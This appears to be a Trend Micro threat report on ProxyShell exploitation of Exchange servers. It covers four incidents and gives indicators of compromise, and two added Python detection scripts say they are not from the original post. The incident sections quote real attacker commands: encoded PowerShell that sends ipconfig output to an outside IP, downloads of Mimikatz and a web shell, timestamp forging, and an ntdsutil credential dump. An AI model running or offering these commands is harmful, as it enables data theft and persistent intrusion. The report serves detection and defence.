Trend Micro Incorporated : Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

11/17/2021 | 08:18am EST

The Trend Micro™ Managed XDR team recently observed a surge in server-side compromises, ProxyShell-related intrusions on Microsoft Exchange in particular, via the Managed XDR service and other incident response engagements. These compromises, which occurred across different sectors in the Middle East, were most often observed in environments using on-premises implementations of Microsoft Exchange.

In the engagements where the attacker's objective was realized, we found that the deployment of ransomware was the most common end-goal for the attacks that occurred in the Middle East. This indicates that threat actor groups have begun to favor the use of exploits related to ProxyShell in order to establish initial access to an organization's system, with the possibility of ransomware attacks being launched down the line.

Using intrusion clusters that overlapped in their initial access techniques, we recently identified a set of intrusions involved in attacks on the Middle East, which we dissect in this blog entry. All of these intrusions share a commonality: they exploited vulnerable ProxyShell servers to gain an initial foothold on the target's network, and each was rooted in an IIS worker process spawning suspicious processes.

Through our observation of the web shell activity on the Trend Micro Vision One platform and by analyzing the process tree created by the Internet Information Services (IIS) process w3wp.exe, we were able to determine the sequence of processes associated with the different attack phases and how they tied into the threat actor's objective.

We clustered all the observed intrusions together to reveal some tactical and operational similarities between the different ransomware affiliates that were deploying the final ransomware payloads. Through the Vision One platform, some intrusions were interrupted early in the infection chain, after which we compared these to other similar intrusions to determine the chain of events (and whether LockFile, Conti, or any other ransomware family currently active in the Middle East threat landscape would be deployed as part of the routine).

In this blog entry, we will take a look at the ProxyShell vulnerabilities that were being exploited in these events, and dive deeper into the notable post-exploitation routines that were used in four separate incidents involving these web shell attacks.

Observations on the ProxyShell exploitation

The exploitation of ProxyShell in these attacks involves three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. The first two were patched in July 2021, while the latter was fixed in May 2021. Successful exploitation of these vulnerabilities can lead to arbitrary file writes that an attacker can leverage to upload web shells on a target Exchange server.

The malicious actor initially tried to start the attack by scanning for previously dropped web shells, which we assume were dropped earlier via vulnerability exploitation. This part failed, as the files returned a 404 error code when accessed.

Figure 1. Scanning for web shells
CVE-2021-34473: pre-auth path confusion

This vulnerability abuses the URL normalization of the Explicit Logon URL: the login email is removed from the URL if the URL suffix is autodiscover/autodiscover.json. This allows arbitrary backend URL access as the Exchange machine account (NT AUTHORITY\SYSTEM).
Figure 2. Exploiting CVE-2021-34473

The Autodiscover service is abused to leak a known user's distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then abused to leak the user's security identifier (SID).

CVE-2021-34523: Exchange PowerShell backend elevation of privilege

Microsoft Exchange has a PowerShell remoting feature that can be used to read and send emails. This functionality cannot be used by NT AUTHORITY\SYSTEM, as it does not have a mailbox. However, when the /powershell backend is reached directly through the previous vulnerability, a user identity can be supplied in the X-Rps-CAT query string parameter; the value is deserialized and used to restore that user's identity.

This technique can be used by an attacker to impersonate a local administrator in order to run PowerShell commands.

Figure 3. An attacker using local administrator account administrator@xxxx along with its SID
CVE-2021-31207: post-auth arbitrary file write

This vulnerability leverages the New-MailboxExportRequest PowerShell command in order to export the user mailbox to an arbitrary file location, which can be used to write a shell on the Exchange server.
Figure 4. Access to the web shell after being imported

The web shell is imported as a mail item inside the administrator@xxx draft mailbox. It is then exported to c:/inetpub/wwwroot/aspnet_client/puqjc.aspx, after which it is accessed and returns a 200 status code.

An analysis of the file system timeline shows the same: the puqjc.aspx file was created at the same time as the malicious web connection (2:00 PM UTC).

Figure 5. The system timeline showing the creation of the file puqjc.aspx
Post-exploitation routines

A web shell is a piece of code written in a web development language (e.g., ASP, JSP) that attackers can drop onto web servers to gain remote access and the ability to execute arbitrary code and commands to meet their objectives. Once a web shell is successfully inserted into the victim's server, it allows remote attackers to perform various tasks, such as stealing data or dropping other malicious tools.

Upon analysis of the intrusion clusters, we were able to identify several variants of web shells used by different threat actors. The scanning and exploitation phases were the same in all the incidents, but the post-exploitation activities and their impact varied.

The following subsections go into the specifics of the post-exploitation routines we analyzed in four separate incidents that occurred in August and September 2021. While some of the incidents shared certain behaviors during infection, their post-exploitation routines varied.

Incident #1

The first web shell
Figure 6. Code showing the exec_code query parameter

In the first incident we handled, we discovered that the web shell employed in the attack uses the exec_code query parameter to execute ASP code. After successfully reaching the command-and-control (C&C) server, it executed commands to gather basic information on the compromised system.

  • "c:\windows\system32\cmd.exe" /c whoami
  • "c:\windows\system32\cmd.exe" /c ping -n 1 google.com

Furthermore, the web shell also executed PowerShell commands, and downloaded and executed other malware.

Figure 7. Executing PowerShell commands and downloading other malware
rundll.bat

The web shell includes a script that kills security software from specific vendors, and then disables the system's firewall.
Figure 8. Code showing how the script terminates security software

It then executes a base64-encoded PowerShell script that downloads another obfuscated PowerShell script, which it then executes. This script is part of the Cobalt Strike malware family, which has the ability to provide backdoor access to infected machines.

Figure 9. Decoded PowerShell command to download and execute Cobalt Strike
Figure 10. Code from the Cobalt Strike obfuscated PowerShell

We also noticed that the malicious actor behind the attack executed scripts to kill specific processes and to clear the PowerShell Windows events log.

Figure 11. Script designed to kill PowerShell-related processes
Liferay CMS

The IP addresses 212.84.32[.]13 and 103.25.196[.]33 are servers running the Liferay content management system (CMS). It seems that these are compromised instances of the software, being used to host the post-exploitation payloads on ports other than the default ones (80, 443, 8080) used by the CMS.
Figure 12. Properties of the Liferay CMS versions found on the IP addresses 212.84.32[.]13 and 103.25.196[.]33

Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).

Incident #2

Similar to the first incident, the malicious actor accesses the server via a web shell and then starts to gather basic information on the system. However, the second incident used PowerShell for different post-exploitation activities.

Our analysis shows that a wget request was sent to a URL on a high-numbered port. Unfortunately, we have no information on what was downloaded, since the URL was already dead by the time of analysis.

"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

  • cmd.exe /c ipconfig
  • cmd.exe /c dir
  • "c:\windows\system32\cmd.exe" /c ping -n 1 google.com
  • "c:\windows\system32\cmd.exe" /c whoami

The web shell was then copied and the original entry deleted using the following commands:

  • cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
  • "c:\windows\system32\cmd.exe" /c del "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorFF.aspx.req"

The output of the ipconfig command was then sent as the body of a wget request.

The following code shows the PowerShell-encoded (top) and decoded (bottom) commands:

"c:windowssystem32cmd.exe" /c powershell.exe -exec bypass -enc JAByAD0AaQBwAGMAbwBuAGYAaQBnACAALwBhAGwAbAAgAHwAIABvAHUAdAAtAHMAdAByAGkAbgBnADsAdwBnAGUAdAAgAC0AVQByAGkAIABoAHQAdABwADoALwAvADkAMQAuADkAMgAuADEAMwA2AC4AMgA1ADAAOgA0ADQAMwA/AFMAZABmAGEAPQBmAGQAcwBzAGQAYQBkAHMAZgBzAGYAYQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBCAG8AZAB5ACAAJAByACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAG8AYwB0AGUAdAAtAHMAdAByAGUAYQBtACIA

$r=ipconfig /all | out-string;wget -Uri http://91.92.136.250:443?Sdfa=fdssdadsfsfa -Method Post -Body $r -ContentType "application/octet-stream"

Mimikatz, a tool that allows users to view and save credentials and is often used for post-exploitation activities, was downloaded by PowerShell, as shown with the following encoded (top) and decoded (bottom) commands:

"c:windowssystem32cmd.exe" /c powershell -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwA5ADEALgA5ADIALgAxADMANgAuADIANQAwADoANAA0ADMALwBtAGkAbQBpAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAXABtAGkAbQBpAC4AZQB4AGUAIgA=

Invoke-WebRequest -Uri "http://91.92.136.250:443/mimi.exe" -OutFile "c:\windows\temp\mimi.exe"

The web shell then downloaded an additional .aspx web shell and modified its timestamps to further disguise it on the system, as seen in the following code:

Invoke-WebRequest -Uri "http://91.92.136.250:443/out.aspx" -OutFile "c:\windows\temp\OutlookCM.aspx"

The web shell was then moved to the OWA directory, and its timestamps were set to match those of an existing file (OutlookCN.aspx) in that directory:

$f1=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCM.aspx'); $f2=(Get-Item 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookCN.aspx'); $f1.creationtime=$f2.creationtime; $f1.lastwritetime=$f2.lastwritetime; $f1.lastaccesstime=$f2.lastaccesstime;

After a few minutes, additional DLLs were created, which were later verified to be web shell files created by either w3wp.exe or UMWorkerProcess.exe.

  • c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_ffhsdhdi.dll
  • c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\owa\8e05b027\e164d61b\app_web_m123qbjp.dll

In relation to this incident, we found the following malicious components and malware were used:

  • OutlookCM.aspx (Trojan.ASP.WEBSHELL.CJ)
  • App_Web_ffhsdhdi.dll (Trojan.Win32.WEBSHELL.EQWO)
  • App_Web_m123qbjp.dll (Trojan.Win32.WEBSHELL.EQWO)

Other web shells

During our investigation into this cluster, we found a specific web shell variant written in C# within an ASP.NET page, which is quite unusual since most web shells that we find are written in PHP instead. This is similar to the bespoke web shell the KRYPTON group utilized in their campaigns. The DLL web shell also had a corresponding ASPX version in the same system.
Figure 13. The web shell written in C#
Figure 14. C# web shell function which executes the Base64 command in CMD
Figure 15. Web shell response for known inputs only, otherwise it will respond with error code 404
Incident #3

The third incident differed from the first two in terms of credential dumping techniques and lateral movement within the system. In this case, the Microsoft ProcDump (Process Dump) tool was used to dump LSASS memory and extract the hashes.
Figure 16. The execution of procdump.exe during the active attack

The Windows utility PsExec was detected during the lateral movement phase. The attacker used it to access remote machines and servers in order to drop and execute a new backdoor malware.

A pass-the-hash attack technique was used to access remote servers and machines, after which a new malware component was dropped in order to create persistence.

Figure 17. Using a pass-the-hash technique for remote access

The following malware were dropped on the infected machines:

  • CacheTask.dll (Backdoor.Win32.COTX.A)
  • dllhost.exe (PUA.Win64.LanGO.B)
  • HostDLL.exe (Trojan.Win64.OGNHOST.A)
Persistence was then established on the remote machines via a scheduled task to keep the backdoor running.
Figure 18. Creating persistence via a scheduled task
Incident #4

We analyzed a fourth incident that used an interesting technique for credential dumping, specifically dumping the Active Directory database via the NT Directory Services utility (ntdsutil):

"C:\Windows\system32\cmd[.]exe" /c ntdsutil "activate instance ntds" ifm "create full c:\windows\temp\ntd" quit quit

Execution Profile

Here is an example of a post-exploitation routine using the ProxyShell instance. After the web shells are dropped, cmd.exe and powershell.exe are used to execute commands on the affected systems.
Figure 19. Trend Micro Vision One ™ console showing the post-exploitation routine using a ProxyShell instance
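The process-tree logic described above (an IIS worker spawning cmd.exe and powershell.exe) is the detection that tied these four incidents together. As an added example, not code from this post, from Trend Micro or from Vision One, the Python below walks a set of constructed, Sysmon-style process-creation events, flags every shell whose ancestry leads back to w3wp.exe or UMWorkerProcess.exe, and tags the command line with the phase it belongs to. The event shape, PIDs and tag names are my own; the command lines echo the ones quoted in the four incidents.

```python
import ntpath
import re

WEB_WORKERS = {"w3wp.exe", "umworkerprocess.exe"}  # IIS and Exchange UM worker processes
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Phase tags keyed by a regex over the lower-cased command line. The command names are the
# ones observed across the four incidents; the tag names are mine.
PHASE_PATTERNS = {
    "recon": re.compile(r"\b(whoami|ping|ipconfig|dir)\b"),
    "encoded-powershell": re.compile(r"\s-e(?:c|n|nc|ncodedcommand)?\s+[a-z0-9+/=]{16,}"),
    "download": re.compile(r"\b(wget|invoke-webrequest|iwr)\b"),
    "credential-access": re.compile(r"\b(ntdsutil|procdump|mimi\.exe)\b"),
    "defense-evasion": re.compile(r"\b(taskkill)\b"),
}

# Constructed process-creation events (not from the post). PID 7100 is a control: a shell
# under svchost.exe that must not be flagged even though it runs the same ipconfig command.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3308, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "w3wp.exe -ap MSExchangeOWAAppPool"},
    {"pid": 5216, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"c:\windows\system32\cmd.exe" /c whoami'},
    {"pid": 5300, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"c:\windows\system32\cmd.exe" /c ping -n 1 google.com'},
    {"pid": 5388, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"c:\windows\system32\cmd.exe" /c powershell.exe -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA=='},
    {"pid": 5402, "ppid": 5388, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AA=="},
    {"pid": 6010, "ppid": 5402, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c ntdsutil "activate instance ntds" ifm "create full c:\windows\temp\ntd" quit quit'},
    {"pid": 7000, "ppid": 900, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 7100, "ppid": 7000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ipconfig"},
]


def _basename(image):
    return ntpath.basename(image).lower()


def flag_web_shell_children(events):
    """Flag shells whose ancestry leads back to an IIS/Exchange worker and tag their phase."""
    by_pid = {event["pid"]: event for event in events}
    findings = []
    for event in events:
        if _basename(event["image"]) not in SHELLS:
            continue
        # Walk up the tree; stop at the first web worker or when the parent is unknown.
        chain, cursor = [_basename(event["image"])], by_pid.get(event["ppid"])
        while cursor is not None:
            chain.append(_basename(cursor["image"]))
            if chain[-1] in WEB_WORKERS:
                break
            cursor = by_pid.get(cursor["ppid"])
        if cursor is None:  # no web worker among the ancestors: not this pattern
            continue
        low = event["cmdline"].lower()
        tags = [name for name, pattern in PHASE_PATTERNS.items() if pattern.search(low)]
        findings.append({"pid": event["pid"], "chain": list(reversed(chain)), "tags": tags})
    return findings


if __name__ == "__main__":
    for finding in flag_web_shell_children(SAMPLE_EVENTS):
        print(finding["pid"], " -> ".join(finding["chain"]), finding["tags"])
```

Walking the full ancestry rather than checking only the immediate parent is what catches the ntdsutil dump: it runs three hops below w3wp.exe (cmd.exe, then powershell.exe, then cmd.exe again), so a parent-only rule would miss it.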
Security recommendations

For the incidents that we encountered, it should be noted that the affected Microsoft Exchange servers were left unpatched, either knowingly or unknowingly, by their respective IT teams. Microsoft had written in August 2021 that patching to the latest cumulative update (CU) or security update (SU) is indeed the first line of defense against threats that exploit vulnerabilities related to ProxyShell.

While mitigation controls, such as a host-based or network-based intrusion prevention system (HIPS/NIPS), can be applied to these servers, it should be noted that these controls only buy time until actual patching occurs, giving IT teams the leeway to trigger the appropriate change management controls.

It is also worthwhile to note that a Microsoft Exchange server would still have an active web shell even if it's patched after a successful compromise. This means that servers that have been compromised via vulnerabilities related to ProxyShell should be inspected thoroughly for any malicious activities since web shells may already exist (and could continue to still be operational). An active web shell can still allow a malicious actor to continue pursuing their chosen objectives such as ransomware infection, cryptocurrency mining, and data exfiltration.

The implementation of proper segmentation for publicly exposed servers should always be reviewed, with their behavior (i.e., processes being launched, anti-malware violations, or network traffic profile) being monitored constantly. For example, the observation of internal network scanning, SMB traffic, or other unusual traffic that has not been seen historically can be a sign that the server has been compromised. Earlier this year, Microsoft wrote an excellent guide for hardening web servers against web shell-based attacks.

Trend Micro Solutions

The capabilities of the Trend Micro Vision One™ platform made both the detection of this attack and our investigation into it possible. We took into account metrics from the network and endpoints that would indicate potential attempts at exploitation. The Trend Micro Vision One Workbench shows a holistic view of the activities observed in a user's environment by highlighting important attributes related to the attack.

Trend Micro Managed XDR offers expert threat monitoring, correlation, and analysis from experienced cybersecurity industry veterans, providing 24/7 service that allows organizations to have one single source of detection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro's wealth of global threat intelligence.

Trend Micro Detections

Endpoint Security products (Real Time scan, Behavior monitoring):
  • Backdoor.ASP.CHOPPER.ASPGJI
  • Backdoor.PHP.WEBSHELL.SBJKWQ
  • Backdoor.ASP.WEBSHELL.UWMAQF
  • Trojan.ASP.WEBSHELL.GIFCM
  • Trojan.ASP.CVE202127065.E
  • Trojan.PS1.COBEACON.SMYXAK-A
  • TROJ_FRS.VSNW1FH21
  • Backdoor.Win32.COTX.A
  • PUA.Win64.LanGO.B
  • Trojan.Win64.OGNHOST.A
  • Fileless.AMSI.PSCoBeacon

Endpoint Security (Deep Security IPS):
  • 1011041 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-34473)
  • 1011050 - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2021-34523)
  • 1011072 - Microsoft Exchange Server Security Feature Bypass Vulnerability (CVE-2021-31207)

Network Security (TippingPoint):
  • 39522: Microsoft Exchange Server Autodiscover SSRF Vulnerability (CVE-2021-34473)
  • 39534: HTTP: Microsoft Exchange Server PowerShell Code Execution Vulnerability (CVE-2021-34523)
  • 40057: HTTP: Microsoft Exchange Server Arbitrary File Write Vulnerability (CVE-2021-31207)

Network Security (Deep Discovery Inspector):
  • CVE-2021-34473 - EXCHANGE SSRF EXPLOIT - HTTP(REQUEST)
  • CVE-2021-31207 - EXCHANGE EXPLOIT - HTTP(RESPONSE)

Indicators of Compromise

Hashes

SHA256 | Details | Detection Name
428D445BA0354CFE78485A50B52B04A949259D32CA939FCE151AA3DD3F352066 | rundll.bat | HackTool.BAT.WinDefKiller.C
28356225C68A84A45C603C5E2EA91A1B2B457DB6F056D82B210CA7853F5CD2F8 | CacheTask.dll | Backdoor.Win32.COTX.A
E3EAC25C3BEB77FFED609C53B447A81EC8A0E20FB94A6442A51D72CA9E6F7CD2 | dllhost.exe | PUA.Win64.LanGO.B
27CB14B58F35A4E3E13903D3237C28BB386D5A56FEA88CDA16CE01CBF0E5AD8E | HostDLL.exe | Trojan.Win64.OGNHOST
5154E76030A08795D22B6CB51F6EA735C3C662409286F21A29B4037231F47043 | - | Trojan.PS1.COBEACON.SMYXAK-A

IPs & URL

  • hxxp:[//]103.25[.]196.33:51680[/]check.
  • hxxp:[//]212.84.32.13:18080[/]get
  • hxxps:[//]122.10.82.109:8090[/]connect
  • hxxp: [//]raw.githubusercontent.com/threatexpress/subshell/master/subshell.aspx
  • 103[.]25[.]196[.]33
  • 212[.]84[.]32[.]13
  • 122[.]10[.]82[.]109
  • 209.14.0[.]234

Strings (IIS logs)

  • autodiscover/autodiscover.json
  • @evil.corp
  • python-requests
  • /powershell/?X-Rps-CAT
  • Cmd commands like (whoami, taskkill, ping, dir, ipconfig)
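The IIS-log strings listed above, together with the CVE-2021-34473 and CVE-2021-34523 request shapes described earlier, translate directly into a log-hunting rule. The Python below is an added example, not code from this post or from Trend Micro: it parses W3C-format IIS log lines and reports each request that matches one of the indicators. The log excerpt is constructed (the times, client IPs, user agents and the X-Rps-CAT value are placeholders), and it deliberately includes a legitimate Autodiscover v2 request, because a naive "@ in the query" rule would flag every real mailbox lookup.

```python
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (not from the post). Line 1 is a legitimate Autodiscover v2
# lookup and must not fire; lines 3-5 follow the exploitation sequence described in the post.
SAMPLE_IIS_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2021-08-20 13:59:58 POST /autodiscover/autodiscover.json Email=user@corp.local&Protocol=ActiveSync 10.0.0.5 Mozilla/5.0 200
2021-08-20 14:00:01 GET /owa/auth/logon.aspx - 10.0.0.5 Mozilla/5.0 200
2021-08-20 14:00:03 POST /autodiscover/autodiscover.json @evil.corp/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.corp 198.51.100.7 python-requests/2.25.1 200
2021-08-20 14:00:05 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=PLACEHOLDER_TOKEN&Email=autodiscover/autodiscover.json%3F@evil.corp 198.51.100.7 python-requests/2.25.1 200
2021-08-20 14:00:09 GET /aspnet_client/puqjc.aspx - 198.51.100.7 python-requests/2.25.1 200
2021-08-20 14:00:11 GET /ecp/default.aspx - 10.0.0.8 Mozilla/5.0 200
"""


def parse_iis_log(text):
    """Parse W3C-format IIS log text into dicts keyed by the names in the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def proxyshell_indicators(row):
    """Return the ProxyShell indicators a single request matches (empty list if none)."""
    stem = row.get("cs-uri-stem", "").lower()
    query = unquote(row.get("cs-uri-query", "")).lower()
    agent = row.get("cs(User-Agent)", "").lower()
    hits = []
    # CVE-2021-34473: the explicit-logon segment lands in the *query* of autodiscover.json
    # ("?@domain/..."), or the Email parameter re-embeds the autodiscover.json path. A normal
    # Autodiscover v2 call carries a real mailbox in Email=, so "@ anywhere" would false-positive.
    if "autodiscover/autodiscover.json" in stem and (
        query.startswith("@") or "email=autodiscover/autodiscover.json" in query
    ):
        hits.append("autodiscover path confusion (CVE-2021-34473)")
    # CVE-2021-34523: an identity blob handed to the PowerShell backend via X-Rps-CAT.
    if "x-rps-cat" in query and ("/powershell" in stem or "/powershell" in query):
        hits.append("X-Rps-CAT on /powershell backend (CVE-2021-34523)")
    # The exploitation tooling in these incidents identified itself as python-requests.
    if "python-requests" in agent:
        hits.append("scripted client user agent")
    # aspnet_client is served by IIS but ships no pages; an .aspx there is a dropped shell
    # until proven otherwise (puqjc.aspx in this cluster).
    if stem.startswith("/aspnet_client/") and stem.endswith(".aspx"):
        hits.append("aspx requested from /aspnet_client/")
    return hits


def hunt_proxyshell(text):
    """Run the indicator checks over a log and return the matching requests with their hits."""
    findings = []
    for row in parse_iis_log(text):
        hits = proxyshell_indicators(row)
        if hits:
            findings.append({"time": row.get("time"), "client": row.get("c-ip"),
                             "uri": row.get("cs-uri-stem"), "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in hunt_proxyshell(SAMPLE_IIS_LOG):
        print(finding["time"], finding["client"], finding["uri"], finding["hits"])
```

Point it at the front-end logs under the HttpProxy folder as well as the default W3SVC logs: the path-confusion request is logged by the front end with the stem /autodiscover/autodiscover.json and the real backend target hidden in the query, which is why the rule inspects the query rather than the stem for /powershell and X-Rps-CAT.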

Vulnerabilities

  • CVE-2021-34473
  • CVE-2021-34523
  • CVE-2021-31207
Authors
  • Mohamed Fahmy, Threat Intelligence Analyst
  • Abdelrhman Sharshar, Threat Intelligence Analyst
  • Sherif Magdy, Threat Intelligence Analyst
  • Ryan Maglaque, Threats Analyst

Disclaimer

Trend Micro Inc. published this content on 17 November 2021 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 17 November 2021 13:17:05 UTC.
